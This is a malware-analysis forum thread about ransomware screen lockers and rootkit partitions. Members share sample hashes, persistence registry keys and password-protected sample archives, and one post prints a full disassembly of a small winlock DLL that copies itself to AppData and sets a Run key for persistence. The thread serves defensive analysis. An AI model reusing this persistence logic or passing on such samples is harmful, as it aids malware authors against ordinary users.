A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #16222  by Cody Johnston
 Tue Oct 23, 2012 2:10 am
@Quads -

The hidden partition is part of the SST rootkit. These 2 infections are commonly seen together. I believe I mentioned it in a blog post a while back.
 #16223  by thisisu
 Tue Oct 23, 2012 2:41 am
Remember that the hidden partition (the one related to TDL4) isn't going to be over 11MB.

The one you listed is 11 GB

In your case, it's Toshiba's recovery partition.
 #16224  by Quads
 Tue Oct 23, 2012 2:50 am

I know what the partition type 17 means normally in the past as I have fixed machines in the past with this (sometimes with more than one of these to remove), but with the 2 machines I have turns out as I start and continue to investigate more that Toshiba Machines do have one of there types of partitions (type 17) ranging from 10 to 15 GB in size which is why I stopped with those 2 machines the GB size is very large for SST

Compared to the SST partitions I have dealt with between 2MB and 15MB, much smaller than GB sizes

 #17083  by EP_X0FF
 Sun Dec 09, 2012 12:13 pm

AutoIt Ransomware moved to Trojan:AutoIt/LockScreen
Reveton related posts moved to Trojan:Win32/Reveton
Tobfy and clones moved to Trojan:Win32/Tobfy
Weelsof related posts moved to Trojan:Win32/Weelsof

Several dumb/offtop posts have been removed.

Note: something from above lockers maybe missed, content will be moved with time.

Note2: When you attach sample here, please add hash or VT/any other scanner link. This can be useful for search.
 #17208  by EP_X0FF
 Sun Dec 16, 2012 2:27 am
hx1997 wrote:MD5: 42F2AFB3F6EBAB257415A0539A80E6FA
Code: Select all
C:\WINDOWS\system32\rundll32.exe C:\Users\GATEWA~1\wgsdgsdgdsgsd.exe,exp
Different. Also uses full screen IE embedded window and create new desktop Desk_Two to switch to it.

Slightly longer description can be found here http://www.microsoft.com/security/porta ... kScreen.CO



Smallest winlock, decrypted actual size ~4.5 Kb :)
Code: Select all
.text:10001000 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
.text:10001000                 public DllEntryPoint
.text:10001000 DllEntryPoint   proc near
.text:10001000 var_8           = dword ptr -8
.text:10001000 hinstDLL        = dword ptr  4
.text:10001000 fdwReason       = dword ptr  8
.text:10001000 lpReserved      = dword ptr  0Ch
.text:10001000                 push    ebx
.text:10001001                 xor     ebx, ebx
.text:10001003                 dec     [esp+4+fdwReason]
.text:10001007                 jnz     jz_AlreadyRunning
.text:1000100D                 mov     eax, [esp+4+hinstDLL]
.text:10001011                 mov     hModule, eax
.text:10001016                 push    MAX_PATH        ; nSize
.text:1000101B                 push    offset ExistingFileName ; lpFilename
.text:10001020                 push    ebx             ; hModule
.text:10001021                 call    ds:GetModuleFileNameA
.text:10001027                 push    5Ch
.text:10001029                 push    ebx
.text:1000102A                 push    offset ExistingFileName
.text:1000102F                 call    ds:StrRChrA
.text:10001035                 inc     eax
.text:10001036                 push    offset String2  ; "iexplore.exe"
.text:1000103B                 push    eax             ; lpString1
.text:1000103C                 call    ds:lstrcmpiA
.text:10001042                 or      eax, eax
.text:10001044                 jnz     short jnz_NotIE
.text:10001046                 push    offset Name     ; "dllDesk_mutex"
.text:1000104B                 push    ebx             ; bInitialOwner
.text:1000104C                 push    ebx             ; lpMutexAttributes
.text:1000104D                 call    ds:CreateMutexA
.text:10001053                 test    eax, eax
.text:10001055                 jz      jz_AlreadyRunning
.text:1000105B                 call    ds:GetLastError
.text:10001061                 cmp     eax, ERROR_ALREADY_EXISTS
.text:10001066                 jz      jz_AlreadyRunning
.text:1000106C                 push    offset ThreadId ; lpThreadId
.text:10001071                 push    ebx             ; dwCreationFlags
.text:10001072                 push    ebx             ; lpParameter
.text:10001073                 push    offset IEWndProc ; lpStartAddress
.text:10001078                 push    ebx             ; dwStackSize
.text:10001079                 push    ebx             ; lpThreadAttributes
.text:1000107A                 call    ds:CreateThread
.text:10001080 jnz_NotIE:                              
.text:10001080                 push    offset aRundll32_exe ; "rundll32.exe \""
.text:10001085                 push    offset Data     ; lpString1
.text:1000108A                 call    ds:lstrcpyA
.text:10001090                 push    offset CurrentFileName ; pszPath
.text:10001095                 push    ebx             ; dwFlags
.text:10001096                 push    ebx             ; hToken
.text:10001097                 push    CSIDL_APPDATA   ; csidl
.text:10001099                 push    ebx             ; hwnd
.text:1000109A                 call    ds:SHGetFolderPathA
.text:100010A0                 push    offset aDllexp_dll ; "\\dllexp.dll"
.text:100010A5                 push    offset CurrentFileName ; lpString1
.text:100010AA                 call    ds:lstrcatA
.text:100010B0                 push    MAX_PATH        ; nSize
.text:100010B5                 push    offset ExistingFileName ; lpFilename
.text:100010BA                 push    hModule         ; hModule
.text:100010C0                 call    ds:GetModuleFileNameA
.text:100010C6                 push    offset CurrentFileName ; lpString2
.text:100010CB                 push    offset ExistingFileName ; lpString1
.text:100010D0                 call    ds:lstrcmpiA
.text:100010D6                 or      eax, eax
.text:100010D8                 jz      short jz_AlreadyRunning
.text:100010DA                 push    ebx             ; bFailIfExists
.text:100010DB                 push    offset CurrentFileName ; lpNewFileName
.text:100010E0                 push    offset ExistingFileName ; lpExistingFileName
.text:100010E5                 call    ds:CopyFileA
.text:100010EB                 push    offset aExp_0   ; "\",exp"
.text:100010F0                 push    offset CurrentFileName ; lpString1
.text:100010F5                 call    ds:lstrcatA
.text:100010FB                 push    eax             ; hKey
.text:100010FC                 push    esp             ; phkResult
.text:100010FD                 push    KEY_SET_VALUE   ; samDesired
.text:100010FF                 push    ebx             ; ulOptions
.text:10001100                 push    offset SubKey   ; "Software\\Microsoft\\Windows\\CurrentVersi"...
.text:10001105                 push    HKEY_CURRENT_USER ; hKey
.text:1000110A                 call    ds:RegOpenKeyExA
.text:10001110                 push    offset Data     ; lpString
.text:10001115                 call    ds:lstrlenA
.text:1000111B                 mov     edx, [esp+8+var_8]
.text:1000111E                 push    eax             ; cbData
.text:1000111F                 push    offset Data     ; lpData
.text:10001124                 push    REG_SZ          ; dwType
.text:10001126                 push    ebx             ; Reserved
.text:10001127                 push    offset ValueName ; "dllexp"
.text:1000112C                 push    edx             ; hKey
.text:1000112D                 call    ds:RegSetValueExA
.text:10001133                 call    ds:RegCloseKey
.text:10001139                 push    ebx             ; nShowCmd
.text:1000113A                 push    ebx             ; lpDirectory
.text:1000113B                 push    offset Parameters ; lpParameters
.text:10001140                 push    offset File     ; "rundll32.exe"
.text:10001145                 push    ebx             ; lpOperation
.text:10001146                 push    ebx             ; hwnd
.text:10001147                 call    ds:ShellExecuteA
.text:1000114D jz_AlreadyRunning:                     
.text:1000114D                 mov     al, 1
.text:1000114F                 pop     ebx
.text:10001150                 retn    0Ch
.text:10001150 DllEntryPoint   endp
background.jpg (190.47 KiB) Viewed 769 times
pass: malware
(1.93 KiB) Downloaded 113 times
 #17444  by rough_spear
 Sat Dec 29, 2012 1:47 pm
Hi All, :D
Bunch of Trojan-Ransom total 22 files.

List of MD5


rough_spear. ;)
password - infected.
(2.75 MiB) Downloaded 134 times
 #17764  by Cody Johnston
 Sat Jan 19, 2013 11:40 pm
This one I thought I had to fix exe associations to get tools to run, but found that this one is sneakier than that. MS calls this one 'Lyposit'.

Places exe and %allusersprofile%\Application Data\<random.exe>

Makes reg key:
HKCU\Software\Microsoft\Command Processor
Autorun = <image path to malware>

Also has funny string in MUI cache:


VT: 25/44
https://www.virustotal.com/file/bf4d14f ... /analysis/

This one is ICC screenlocker same as in the past, looks like file is from about 3 weeks ago


MD5: 76ac324df35bf1dbfea30c629f63d19c
Password: infected
(106.45 KiB) Downloaded 119 times
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